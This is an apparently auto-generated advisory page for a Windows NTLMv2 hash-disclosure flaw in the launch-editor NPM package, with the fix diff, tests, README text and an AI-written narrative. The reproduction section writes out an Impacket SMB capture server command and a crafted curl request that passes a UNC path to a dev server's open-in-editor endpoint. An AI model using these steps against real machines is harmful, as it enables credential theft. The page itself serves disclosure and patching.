launch-editor: NTLMv2 hash disclosure via UNC path handling on Windows
Description
CVE-2026-53632 affects the launch-editor NPM package on Windows, allowing an attacker to leak NTLMv2 password hashes by exploiting UNC path handling to an SMB server.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CVE-2026-53632 affects the `launch-editor` NPM package on Windows, allowing an attacker to leak NTLMv2 password hashes by exploiting UNC path handling to an SMB server.
Vulnerability
The launch-editor NPM package accepts arbitrary file paths, including Windows UNC paths such as \\attacker-host\share, without proper validation or restriction [1][2]. On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server without any user interaction or warning [1][2]. This affects all versions of launch-editor that do not sanitize UNC paths.
Exploitation
An attacker must know the URL of a server running a middleware that uses launch-editor and must send the victim a crafted request that causes the middleware to open a UNC path pointing to an attacker-controlled SMB server [1][2]. The victim must be using Windows with NTLM enabled (default) and must access the attacker's website or link while the development server is running [1][2]. The attacker sets up an SMB server (e.g., using Impacket's smbserver.py) to capture the incoming NTLM authentication hashes [2].
Impact
If successful, the attacker captures the victim's NTLMv2 password hash [1][2]. This hash can be cracked offline to reveal the cleartext password, potentially leading to further compromise of developer accounts or internal systems if the password is weak [1][2].
Mitigation
Microsoft recommends disabling NTLM where possible [1], but no official patch for launch-editor has been disclosed in the available references as of the publication date [2]. The CVE is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Users should exercise caution when opening links that could trigger file path handling.
AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <= 0.1.23
Patches
10cc9550e05c3fix: reject UNC paths (#138)
3 files changed · +70 −0
packages/launch-editor/index.js+8 −0 modified@@ -67,6 +67,14 @@ function launchEditor(file, specifiedEditor, onErrorCallback) { let { fileName } = parsed const { lineNumber, columnNumber } = parsed + if (process.platform === 'win32' && path.resolve(fileName).startsWith('\\\\')) { + return onErrorCallback( + fileName, + 'UNC paths are not supported on Windows to avoid security issues. ' + + 'See https://github.com/vitejs/launch-editor/tree/main/packages/launch-editor#unc-paths-on-windows for details.', + ) + } + if (!fs.existsSync(fileName)) { return }
packages/launch-editor/index.test.js+50 −0 added@@ -0,0 +1,50 @@ +const assert = require('node:assert/strict') +const { describe, test, mock } = require('node:test') + +const launchEditor = require('./index.js') + +const UNC_ERROR = 'UNC paths are not supported on Windows to avoid security issues.' + +describe('launchEditor UNC path guard', () => { + if (process.platform === 'win32') { + test('rejects UNC paths on Windows via the error callback', () => { + const onError = mock.fn() + + launchEditor('\\\\server\\share\\file.js', 'vim', onError) + + assert.equal(onError.mock.callCount(), 1) + const [fileName, message] = onError.mock.calls[0].arguments + assert.equal(fileName, '\\\\server\\share\\file.js') + assert.ok(message.includes(UNC_ERROR)) + }) + + test('strips the position suffix before reporting the rejected UNC path', () => { + const onError = mock.fn() + + launchEditor('\\\\server\\share\\file.js:10:5', 'vim', onError) + + assert.equal(onError.mock.callCount(), 1) + const [fileName, message] = onError.mock.calls[0].arguments + assert.equal(fileName, '\\\\server\\share\\file.js') + assert.ok(message.includes(UNC_ERROR)) + }) + + test('does not treat a normal absolute Windows path as UNC', () => { + const onError = mock.fn() + + // Non-existent file: without the UNC guard firing, launchEditor returns + // silently at the `fs.existsSync` check without invoking the callback. + launchEditor('C:\\Users\\me\\does-not-exist-xyz.js', 'vim', onError) + + assert.equal(onError.mock.callCount(), 0) + }) + } else { + test('does not apply the UNC guard on non-Windows platforms', () => { + const onError = mock.fn() + + launchEditor('\\\\server\\share\\does-not-exist-xyz.js', 'vim', onError) + + assert.equal(onError.mock.callCount(), 0) + }) + } +})
README.md+12 −0 modified@@ -109,3 +109,15 @@ column=$3 # call your editor with whatever args it expects my-editor -l $line -c $column -f $filename ``` + +## UNC paths on Windows + +On Windows, `launch-editor` refuses to open files whose resolved path is a [UNC path](https://learn.microsoft.com/en-us/dotnet/standard/io/file-path-formats#unc-paths), that is, a path that starts with `\\`, such as `\\server\share\file.js`. + +When a UNC path points at a remote host, any filesystem operation `launch-editor` performs on it (such as the `fs.existsSync` check used to verify the file before launching the editor) causes Windows to connect to that host over SMB. An attacker who controls the requested file path could point it at a server they control and abuse this to leak the current user's NTLM credentials: Windows automatically attempts NTLM authentication against the remote host, sending the user's NTLM challenge-response, which the attacker can capture for offline cracking or relay to another service (an NTLM relay attack). Because the file path frequently originates from untrusted input (for example, the `file` query parameter handled by `launch-editor-middleware`), `launch-editor` rejects UNC paths up front so it never performs any filesystem operation on them. + +When a UNC path is rejected, the error callback is invoked with: + +> UNC paths are not supported on Windows to avoid security issues. + +If you need to edit a file on a network share, map the share to a drive letter first and pass that path (e.g. `Z:\file.js`) instead.
Vulnerability mechanics
Root cause
"Missing validation of Windows UNC paths in `launch-editor` allows an attacker to trigger automatic NTLM authentication to a remote SMB server, leaking the user's NTLMv2 password hash."
Attack vector
An attacker sends a crafted HTTP request to a development server that uses `launch-editor`, supplying a Windows UNC path (e.g., `\\attacker-host\share`) as the file parameter [ref_id=1]. On Windows, opening this UNC path triggers an automatic NTLM authentication attempt to the attacker-controlled SMB server, leaking the victim's NTLMv2 password hash without any user interaction or warning [ref_id=1]. The attacker can then crack the hash offline to recover the cleartext password. The attack requires the victim to be on Windows with NTLM enabled (default), to visit the attacker's website that sends a request to the middleware, and for the server using `launch-editor` to be running and reachable [ref_id=1].
Affected code
The `launch-editor` NPM package accepts file paths without validating or restricting Windows UNC paths such as `\\attacker-host\share`. The advisory states that `launch-editor` "accepts file paths without validating or restricting Windows UNC paths" [ref_id=1]. The patch is at https://github.com/vitejs/launch-editor (commit `0cc9550e05c35224a1f61914b9731723f78c06a7`) [patch_id=6085386].
What the fix does
The patch (commit `0cc9550e05c35224a1f61914b9731723f78c06a7`) adds validation to reject Windows UNC paths in the file input [patch_id=6085386]. By blocking paths that begin with `\\`, the fix prevents `launch-editor` from ever passing a UNC path to the Windows shell, thereby stopping the automatic NTLM authentication handshake that would leak the user's NTLMv2 hash. The advisory does not specify the exact code change, but the commit is the official fix for this vulnerability.
Preconditions
- configThe victim must be running Windows with NTLM enabled (default)
- inputThe victim must visit an attacker-controlled website that sends a request to a middleware using launch-editor
- networkThe server using launch-editor must be running and the attacker must know its URL
Reproduction
1. On the attacker machine, create an SMB share: `mkdir /tmp/data && echo "Hello world" > /tmp/data/test.txt` then start the SMB server: `sudo smbserver.py -smb2support -debug share /tmp/data` [ref_id=1]. 2. On the victim machine, run any project that uses `launch-editor` (e.g., a Vite dev server) [ref_id=1]. 3. Send a crafted request to the victim's dev server: `curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'` (URL-encoded UNC path) [ref_id=1]. 4. Observe the NTLMv2 hash appear in the SMB server logs [ref_id=1].
Generated on Jun 15, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.